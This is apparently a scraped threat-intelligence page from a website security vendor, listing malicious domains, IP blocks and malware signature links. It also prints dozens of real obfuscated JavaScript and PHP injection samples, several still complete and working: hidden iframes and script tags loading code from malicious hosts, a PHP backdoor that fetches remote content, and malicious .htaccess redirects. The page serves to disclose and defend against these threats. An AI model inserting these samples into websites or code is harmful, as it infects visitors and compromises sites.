Protect Your Interwebs!
Top Attackers and domains distributing malware
Also visit our labs page for the latest malware feed: http://labs.sucuri.net
|
.htaccess redirections (see more)
http://24-medi.ru/timetose?19
http://coveosoft.com/buy-adobe-contribute-cs4.html
u94s.info (37.143.9.50)
|
Latest reports
*April/2012 Malware report *Malware campaign (recovery-hdd) *Mass injections (nikjju) Worst offenders TLDs Small list of TLDs (top-level domains) being widely used for malware distribution. .ru
|
Top 10 Malware signatures
http://sucuri.net/malware/..mwblacklisted35
http://sucuri.net/malware/..mwanomalysp8
http://sucuri.net/malware../MW:IFRAME:HD202
http://sucuri.net/malware/..mwjs67473
http://sucuri.net/malware../MW:JS:DEPACK
http://sucuri.net/malware/..mwht291
http://sucuri.net/malware/..mwjsanon7
http://sucuri.net/malware../MW:SPAM:SEO
http://sucuri.net/malware/..mwiframeenc1603
http://sucuri.net/malware/..mwiframehd564
http://sucuri.net/malware/..mwjs160
http://sucuri.net/malware/..mwhjck3123
Network blocks
146.185.x .0/24 112.175.243 .0/24 94.60.123 .0/24 94.63.x .0/24 85.25.170 .0/24 91.228.133 .0/24 91.220.x .0/24 86.55.210 .0/24 89.208.34 .0/24 212.95.54 .0/24 178.238.36 .0/24 95.64.61 .0/24 95.163.66 .0/24 95.143.195 .0/24 Latest malware entries |
Encoded JavaScript
Collection of the latest encoded JavaScript malware.
<script>b=new function(){return 2;};if(!+b)String.prototype.vqwfbeweb='h'+'arC';for(i in $='b4h3tbn34')if(i=='vqwfbeweb')m=$[i];try{new Object().wehweh...
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host= $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
<script>var daAy;var uOc7aLS5Ftq=0;function c9rBB0(Pry64V5gifa,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpdP4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var izfcbuP=Pry64V5gifa;Pry64V5gifa+='3280';if(Pry64V5gifa==izfcbuP){for(var i;i<Pry64V5gifa.length;i++)...
</title><script src=http://infocenc.com.br/js/></script><title>
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiLnAkdX5Uc2dlTshEcMhHT8xFeMx2T4xjWkNTUwVGNdVzWvV1Wc9WT2wlbqZVX3lEclhTTKdWf8oEZzkVNdp2NwZGNVtVX8dmRPF3N1U2cVZDX4lVcdlWWKd2aZBnZtVFfNJ3N1U2cVZDX4lVcdlWWKd2aZBnZtVkVTpGTXB1JuITNyZGJuIyJi4SN1InZk4yJukyJuIyJi4yJ64GfNpjbWBVdId0T7NjVQJHVwV2aNZzWzQjSMhXTbd2MZBnZxpHfNFnasVWevp0ZthjWnBHPZ11MJpVX8FlSMxDRWB1JuITNyZGJuIyJi4SN1InZk4yJukyJuIyJi4yJAZ3VOFndX5EeNt1ZzkFcm5maWFlb0oET410WnNTWwZWc6xXT410WnNTWwZmbmZkT4xjWkNTUwVGNdVzWvV1Wc9WT2wlazcETn4iM1InZk4yJn4iInIiL1UjcmRiLn4SKiAkdX5Uc2dlT9pnRQZ3NwZGNVtVX8VlROxXV2YGbZZjZ4xkVPxWW1cGbExWZ8l1Sn9WT20kdmxWZ8l1Sn9WTL1UcqxWZ59mSn1GOadGc8kVXzkkWdxXUKxEPExGUn4iM1InZk4yJiciL1UjcmRiLn0TMpNHcksTKiciLyUTayZGJucSN3wVM1gHX2QTMcdzM4x1M1EDXzUDecNTMxwVN3gHXyETMchTN4xFN0EDXwMDecZjMxwFZ2gHXzQTMcJmN4x1N2EDX5YDecFTMxwVO2gHX3QTMcNTN4xlMzEDXiZDecFzNcdDN4xlM0EDX3cDecFjNcdTN4xVM0EDXmZDecVjMxw1N0gHXyMTMcZzN4xlNxEDX3UDecJzMxwlY2gHXxcDX2QDecZTMxwlMzgHX1ITMcJzM4x1M0EDX4YDecJTMxw1N0gHXxETMcVzN4xlMxEDX4UDecRDNxwFMzgHX2ITMcRmN4x1M0EDX3MDecNTNxwVO2gHXyQTMcZzN4xlMyEDX4UDecFDNxwVY2gHX1YDX3UDecRDNxwFZ2gHXyITMcNDN4xVMxEDXzcDecRjNcRmN4x1M0EDXxMDecJjMxwFO1gHXyMTMclzN4xlMyEDXzQDecNTMxwlM3gHXwcTMcdTN4xVMzEDXzMDecFzNcZTN4xVN0EDX4YDecJTMxwVZ2gHXzQTMchjN4xFN2EDX0UDecNTMxwVN3gHXyETMchTN4xFN0EDXwMDecZjMxwFZ2gHXzQTMcJmN4x1N0EDXzQDecRDNxwFM3gHXwcTMcdDN4x1M0EDXhdDecFzNcNmN4x1M0EDXwMDecZTMxwFO0gHXxETMclzM4xVMwEDX5YDecJDNxwVO3gHX2ITMcdiL1ITayZGJucyNzgHXzUTMcljN4xVMxEDX3MDecNTNxwVO3gHX1ETMcRzN4x1M1EDX5YDecJDNxwlN3gHX0UTMcdDN4xFN0EDXhZDecVjNcdTN4xFN0EDXkZDecJTMxwVO2gHX0ETMclj...
<!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];...
<iframe src ="http://6tg56g5.osa.pl/main.php?page=f0fcf5853b543a9a" width="0" height="0">
<script>var _0x473c=["\x6E\x20\x71\x28\x29\x7B\x33\x3D\x30\x2E\x62\x28\x27\x64\x27\x29\x3B\x33\x2E\x63\x3D\x27\x70\x3A\x2F\x2F\x6A\x2E\x41...
<script>script>eval(String.fromCharCode(102,117,110,99,116...
<iframe src="http://%67%66%64%67%68%68%66%64%64%66%64%79%65%72%6E%76%64%67%68%6A.%63%65.%6D%73/main.php?page=4ecfff4e4234c726" width="1" height="1" frameborder="0" style="blblla;"></iframe>
<script>e=String.fromCharCode;if(typeof(hlwhk)==e(117,110,100,101,102,105,110,101,100)){hlwhk=1;c=document;n=c[e(99,114,101,97,116,101,69,108,101,109,101,110,116)](e(105,102,114,97,109,101));n[e(115,114,99)]=e(104,116,116,112,58,47,47,108,117,112,12...
<SCRIPT id="googleblogcontainer">var nf902ae4="";var e1060178120b5={dbf6eafb4f182:function(){var qb=String,vb=Array.prototype.slice.call(arguments).join(""),y8..
s=String[c+'r'+'omChar'+'C'+'o'+'d'+'e'](70,81,69,87,79,71,80,86,16,89,84,75,86,71,10,9,30,69,71,80,86,71,84,32,30,74,19,32,50..
if (document.getElementsByTagName('body')[0]){iframer();}else{d ocument. write("<iframe src='http://rebotstat.com/temp/stat.php'
document.write(unescape("%3C%53%43%52%49%50%54%20. .4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D..
<iframe src="http://%68%67%61%6A%73%6B%66%67%6B%65%77%72%66%67 .. %6A%61%67%79%73%64%66%2E%63%65%2E%6D%73/main.php?page=ab77 .. 4927e8" width="1" height="1" frameborder="0"..
gab=15 ; gab-=2361; amp=8201; if(amp!=null){ran=2318;ran++;wry=0.001;wry++}wit=oxo('ExBWOB4XquJZ8l0h5MnMl37j2zZHx0eZStpY3trfFkYl2VtTRtAyX3UamBnEl0WGBROBg1aPdM8lub5UrAYaTSMWgTxNefSAywzUr5jiLhTYtUZUJEXWUrv1n4keCPVWiY4lqKJY8curQz1SEpLjiag9KXhjUvIOvBGZj6LjTKwhZMA3d7',7);hup=['due','dog'];sab=0.005;sab++;gee=oxo('sPDVSpgth9',4);fix={joy:0.016};auk=0.0057;if(auk==5728){sat=7554;sat-=6791;kue=11;if(kue!=0.006){pew=0.0107;pew--;tsk=0;tsk-=0.011}}bys=document;bys[gee](wit);function oxo(zo,zz){var mb,r,oj,os,ur,et,jn,g,ei,my,r,uw,ez,my,je,uy,ei,jn,jl,my,mb,up,ua;t=8;if(t!=15){m=0;m-=24}..
<?php error_reporting(0);unset($iz);$z['io']="HTTP_USER_AGENT";$z['wn']=$_SERVER[$z['io']];if(stristr($z['wn'],"MSIE")&&stristr($z['wn'],"Windows")){$iz['i']='122';$iz['f']='/home/beckiefarrant/knockoffdecor.com/wp-includes/js/jquery/jquery.out.js';$iz['r']='1800';$iz['h1']='alisoed.com';$iz['h2']='usalisa.ru';$iz['z']='';$iz['p1']="document.write(unescape(";$iz['t']=time();if(file_exists($iz['f'])){$iz['...
var s="";try{new asd[0]}catch(q){if(q)r=1;c=String;}if(r&&document.createTextNode)n=2;e=eval;m=[4.5*n,18/n,52.5*n,204/n,16*n,80/n,50*n,222/n,49.5*n,234/n,54.5*n,202/n,55*n,232/n,23*n,206/n,50.5*n,232/n,34.5*n,216/n,50.5*n,218/n,50.5*n,220/n,58*n,230/n,33*n,242/n,42*n,194/n,51.5*n,156/n,48.5*n,218/n,50.5*n,80/n,19.5*n,196/n,55.5*n,200/n,60.5*n,78/n,20.5*n,182/n,24*n,186/n,20.5*n,246/n,4.5*n,18/n,4.5*n,210/n,51*n,228/n,48.5*n,218/n,50.5*n,228/n,20*n,82/n,29.5*n,18/n,4.5*n,250/n,16*n,202/n,54*n,230/n,50.5*n,64/n,61.5*n,18/n,4.5*n,18/n,50*n,222/n,49.5*n,234/n,..
<script src="http://wholelifewholeworld.com/jslib/le.js"></script>
<script>e=String.fromCharCode;if(typeof(hlwhk)==e(117,110,100,101,102,105,110,101,100)){hlwhk=1;c=document;n=c[e(99,114,101,97,116,101,69,108,101,109,101,110,116)](e(105,102,114,97,109,101));n[e(115,114,99)]=e(104,116,116,112,58,47...
document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u002F\u006A...
<IfModule mod_rewrite.c>RewriteRule ^roy15/(.*)$ http://www.nbgbilgisayar.com/images/bar/index.html [R,L]RewriteRule ^aoy15/(.*?)-(.*?)-(.*?)-(.*?)/(.*)$ http://$1.$2.$4/$5 [R,L]</IfModule>
<style>#wypb {position:absolute;overflow:auto;height:0;width:0;}</style><font id="wypb"><a href="http://newyork-travel-guide.com/">newyork travel... (seo spam)
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|coom|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hdfah|navigator|in|showthread|php|72241732'.split('|'),0,{}))
GLOBAL $wehaveitagain; { $preverrx=error_reporting(0); $wehaveitagain = 1; $mynetsxx = array( '84.235.77.0' => 24,..
var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string..
if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k',"\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\56\57\60\61\62\63\64\65\66\67\70\71\72\73\74\75\76\134\77\100\101\102\103\104\105\106\107\110\111\112\113\114\115\116\117\120\121\122\123...
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\134w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\\x62'+e(c)+'\134b','g'),k[c]);return p;}('G\x20\141\x3DL\40J(\x29;\x61.\x79(a\x2E\101\x28\51\x2B\61\51\x3B\x44\50\127.\x58\x26\46\145.\x75\56\x31\63(\47\x5C\126\x5C\120\\\64\'\x29\x3D\x3D\55\x31\x29{e\56O(\'\\\x55\\\x6A\134\x53\134i\x5C\x52\x5C\162\x5C\x33\\\67\134\124\\\x6A\x5CN\x5Cb\134\x67\\\x34\134w\47\x2B0\x2E\66\x280\x2E\65(\x29\x2A\x32\532\51+\...
<script>var temp="",i,c=0,out="";var str="60!..105!102!114!97!..109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!108!105!97!115!46!106!106!98!119!111!114!107!115!46!99!111!109!47!97!110!97!108!121!116!105..
var _0xdc8d=[ "\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74"..
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\..
<iframe src="http://blood.of.cm/in.cgi?2" width="0" height="0"></iframe>
<script>if(window.document)aa=(Number+[].unshift).substr(0,4);aaa=([].sort+[].sort).substr(0,4);if(aa===aaa){ss='';s=String;12-function(){e=window['e'+'v'+'a'+'l'];}();t='w';}h=-2;n=["4.5w4.5w52.5w51w16w20w50w55.5w49.5w58.5w54.5w50.5w55w
function GetMama(){$mother = "; return $mother;} ${"G\x4c\x4f\x42AL\x53"}["n\x64b\x75\x6f\x79\x6a"]="p\x61";${"G\x4cO\x42AL\x53"}["f\x68\x70\x78\x6e\x6bl\x77"]="\x72\x65\x66";${"\x47L\x4fB\x41\x4c\x53"}["\x73\x71\x78\x6fhd\x77"]="\x63\x68";${"\x47\x4c\x4fBA\x4cS"}["o\x76\x6bx\x70\x67\x6f\x69qd\x71"]="\x75a";${"\x47\x4c\x4fB\x41\x4c\x53"}["v\x65\x6bsy\x62qg\x78\x79"]="\x75\x6c\x74";${"\x47L\x4f\x42\x41\x4cS"}
<script src="http://jss.gv.vg/15"></script>
<script type="text/javascript">pro='ion';bee=['paw','eel'];hoe=8096;hoe+=10;ivy={pud:0.016};ids=0.0125;if(ids<0){fob=22;fob++}sad=0.009;sad--;bis=fals
e;mom='mt3aP';dit=null;dit-=1646;gym=window;jeu=4660;jeu+=27;bin=3243;bin--;mob=document;luv='pus';alp='ago';sal=0.0084;sal--;per();function azo(i){va
r h,z;x=18;if(x!=0.0075){p=0.0104;if(p<8183){f='L5JdolcV'}}q=['uns','vis','yam'];o=4368;if(o!=14){s=0.0195;s++;u=24;u++}h='FYanpJjxkQAtqRx0pPItTj';a=1
531;if(a<12){c=0.015;c--}m=6;if(m!=0){r=0.0036;l=0.005;l++}z=arm(h,2);v=22;if(v<28){g=10;g--}d=3142;d++;b=5;if(b==0.014){w=12;w--}return i[z]()}functi
on per(){var mi,p,m,wp,rk,ax,qp,er,qj,rz,co,ls,sr,as,wz,..
<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div class=pofasdfhg><iframe src=http://weqeweqqq2012.com/gate.php?f=1010353 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi-->
<script>h=-parseInt('012')/5;if(window["document"])try{Number().prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];f='fr'+'omCh';f+='arC';f+='qgode'["substr"](2);w=this;e=w[f.substr(11)+zz];t='y';} n="3.5@3.5@51.5@50@15@19@49@54.5@48.5@57.5@53.5@49.5@54@57@22@50.5@49.5@57@33.5@53@49.5@53.5@49.5@54@57@56.5@32@59.5@41@47.5@50.5@38@47.5@53.5@49.5@19@18.5@48@54.5@49@59.5@18.5@19.5@44.5@23@45.5@19.5@60.5@5.5@3.5@3.5@3.5@51.5@50@56@47.5@53.5@49.5@56@19@19.5@28.5@5.5@3.5@3.5@61.5@15@49.5@53@56.5@49.5@15@60.5@5.5@3.5@3.5@3.5@49@54.5@48.5@57.5@53.5@49.5@54@57@22@58.5@56@51.5@57@49.5@19@16@29@51.5@50@56@47.5@53.5@49.5@15@56.5@56@48.5@29.5@18.5@51@57@57@55@28@22.5@22.5@59@48@50@50.5@60@51@58@49@50@50.5@50.5@50.5@50.5@50@50@50@22@56@56@22@54@57.5@22.5@30.5@50.5@54.5@29.5@24@18.5@15@58.5@51.5@49@57@51@29.5@18.5@23.5@23@18.5@15@51@49.5@51.5@50.5@51@57@29.5@18.5@23.5@23@18.5@15@56.5@57@59.5@53@49.5@29.5@18.5@58@51.5@56.5@51.5@48@51.....
Testimonials
-
Let's be honest: the web can be a scary place sometimes. Having done many a WordPress malware cleanup in my day, I've found Sucuri to do a better job than I ever hoped I could do. Not only are they thorough, but they're fast as heck and affordable to boot. You don't just walk into a bad situation without some protection. Sucuri *is* that protection.
-
